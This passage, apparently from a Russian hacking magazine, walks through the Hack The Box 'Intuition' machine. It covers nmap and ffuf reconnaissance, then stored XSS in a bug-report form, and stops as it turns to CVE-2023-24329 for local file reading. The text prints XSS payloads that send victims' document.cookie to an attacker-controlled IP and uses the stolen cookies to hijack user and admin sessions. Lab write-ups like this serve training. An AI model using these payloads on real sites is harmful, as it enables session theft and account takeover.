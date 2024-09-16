Се­год­ня я покажу, как повысить пра­ва в Linux через уяз­вимость в ран­нере Ansible. Но преж­де нам понадо­бит­ся заюзать XSS на сай­те сна­чала для получе­ния дос­тупа к стра­нице поль­зовате­ля, а потом для повыше­ния при­виле­гий. Затем исполь­зуем прош­логод­ний баг в биб­лиоте­ке urllib, что­бы читать фай­лы на сер­вере, а для прод­вижения к дру­гому поль­зовате­лю изу­чим логи Suricata.

На­ша цель — получе­ние прав супер­поль­зовате­ля на машине Intuition с учеб­ной пло­щад­ки Hack The Box. Уро­вень задания — слож­ный.

warning Под­клю­чать­ся к машинам с HTB рекомен­дует­ся толь­ко через VPN. Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.

Разведка

Сканирование портов

До­бав­ляем IP-адрес машины в / etc/ hosts :

10. 10. 11. 15 intuition. htb

И запус­каем ска­ниро­вание пор­тов.

Справка: сканирование портов Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да. На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та: #!/ bin/ bash ports = $( nmap -p- --min-rate = 500 $1 | grep ^[ 0- 9] | cut -d '/ ' -f 1 | tr '\ n' ', ' | sed s/, $/ / ) nmap -p $ports -A $1 Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A ).

Ска­нер нашел два откры­тых пор­та:

22 — служ­ба OpenSSH 8.9p1;

80 — веб‑сер­вер Nginx 1.18.0.

Так­же отме­чаем, что веб‑сер­вер на 80-м пор­те редирек­тит на домен comprezzor. htb , поэто­му добавим его в файл / etc/ hosts .

10. 10. 11. 15 intuition. htb comprezzor. htb

Пе­рехо­дим к сай­ту на веб‑сер­вере и сра­зу получа­ем фор­му для заг­рузки фай­лов.

Точка входа

Ни­же на стра­нице есть ссыл­ка на фор­му, куда мож­но отправ­лять информа­цию о най­ден­ных багах.

Ссыл­ка ведет на сайт report. comprezzor. htb , поэто­му, преж­де чем идти смот­реть на него, сно­ва добавим запись в файл / etc/ hosts .

10. 10. 11. 15 intuition. htb comprezzor. htb report. comprezzor. htb

Так как мы уже наш­ли сайт на под­домене report , есть смысл проб­рутить под­домены по спис­ку: так мы смо­жем най­ти еще боль­ше сай­тов, а соот­ветс­твен­но, и боль­ше точек вхо­да. Под­бирать под­домены будем с помощью ути­литы ffuf.

Справка: сканирование веба c ffuf Од­но из пер­вых дей­ствий при тес­тирова­нии безопас­ности веб‑при­ложе­ния — это ска­ниро­вание методом перебо­ра катало­гов, что­бы най­ти скры­тую информа­цию и недос­тупные обыч­ным посети­телям фун­кции. Для это­го мож­но исполь­зовать прог­раммы вро­де dirsearch и DIRB. Я пред­почитаю лег­кий и очень быс­трый ffuf. При запус­ке ука­зыва­ем сле­дующие парамет­ры: -w — сло­варь (я исполь­зую сло­вари из набора SecLists);

— сло­варь (я исполь­зую сло­вари из набора SecLists); -t — количес­тво потоков;

— количес­тво потоков; -u — URL;

— URL; -H — HTTP-заголо­вок. Мес­то перебо­ра помеча­ется сло­вом FUZZ.

За­даем все нуж­ные парамет­ры:

ffuf -u http:/ / comprezzor. htb/ -H 'Host: FUZZ. comprezzor. htb' -w subdomains- bitquark- top100000. txt -t 256

В вывод прог­раммы попада­ют абсо­лют­но все сло­ва из спис­ка, поэто­му необ­ходимо добавить филь­тр, нап­ример по раз­меру стра­ницы (параметр -fs ).

ffuf -u http:/ / comprezzor. htb/ -H 'Host: FUZZ. comprezzor. htb' -w subdomains- bitquark- top100000. txt -t 256 -fs 178

На­ходим еще два под­домена. Обновля­ем запись в фай­ле / etc/ hosts и наконец идем смот­реть сай­ты.

10. 10. 11. 15 intuition. htb comprezzor. htb report. comprezzor. htb auth. comprezzor. htb dashboard. comprezzor. htb

На auth. comprezzor. htb нас встре­чает фор­ма авто­риза­ции, а dashboard. comprezzor. htb недос­тупен даже пос­ле регис­тра­ции и авто­риза­ции.

Ку­да инте­рес­нее фор­ма отправ­ки отче­тов, так как ее мож­но потес­тировать на раз­ные уяз­вимос­ти.

По логике, если отчет кто‑то прос­матри­вает, мы можем поп­робовать про­экс­плу­ати­ровать уяз­вимость XSS. Для это­го запус­тим локаль­ный веб‑сер­вер:

python3 - m http . server

И отпра­вим наг­рузку, которая дол­жна будет выпол­нить зап­рос на этот веб‑сер­вер.

< img src= x onerror= 'fetch( "http:// 10. 10. 16. 22: 8000/ test_xss") ' / >

На веб‑сер­вер при­шел зап­рос, а зна­чит, на сай­те есть XSS. Недол­го думая, поп­робу­ем ста­щить куки поль­зовате­ля.

< img src= x onerror= 'fetch( "http:// 10. 10. 16. 22: 8000/ test_xss" + document. cookie) ' / >

В логах появ­ляет­ся длин­ная стро­ка. Заг­ружа­ем куки в бра­узер, пометив, что они пред­назна­чены для сай­та dashboard, и перехо­дим на этот сайт.

Точка опоры

Повышение привилегий

На стра­нице мы можем смот­реть сами отче­ты, перехо­дя по ссыл­кам в Report ID. При этом на стра­нице самого отче­та мож­но повысить его при­ори­тет.

При повыше­нии при­ори­тета отче­та, веро­ятно, его будет изу­чать уже адми­нис­тра­тор. А зна­чит, мы смо­жем пов­торить трюк с XSS и получить cookie. Откро­ем отчет и повысим его при­ори­тет, и, ког­да адми­нис­тра­тор перей­дет к нему, мы получим его куки.

< img src= x onerror= 'fetch( "http:// 10. 10. 16. 22: 8000/ test_xss" + document. cookie) ' / >

При­меня­ем куки в хра­нили­ще бра­узе­ра Chrome и обновля­ем стра­ницу. Теперь нам дос­тупен дру­гой даш­борд, а так­же нес­коль­ко новых фун­кций.

Од­на из инте­рес­ных воз­можнос­тей — это сос­тавле­ние отче­та в PDF по пре­дос­тавлен­ному URL.

Пер­вой моей иде­ей было про­верить, нет ли тут SSRF, и поп­робовать ста­щить локаль­ные фай­лы через схе­му file:// / . Прав­да, это резуль­татов не дало.

Поп­робу­ем прис­лать тес­товый зап­рос на свой лис­тенер. Запус­тим его:

nc -nlvp 8000

Об­рати вни­мание на исполь­зуемую на сер­вере биб­лиоте­ку — Python-urllib/ 3. 11 . Ее мож­но уви­деть в HTTP-заголов­ке User-Agent .

В этой биб­лиоте­ке в прош­лом году наш­ли уяз­вимость CVE-2023-24329.

Я поис­кал экс­пло­иты в Google и лег­ко отыс­кал под­ходящий. Если URL будет начинать­ся с про­бела, то мы смо­жем читать локаль­ные фай­лы через « file:/// » .

LFI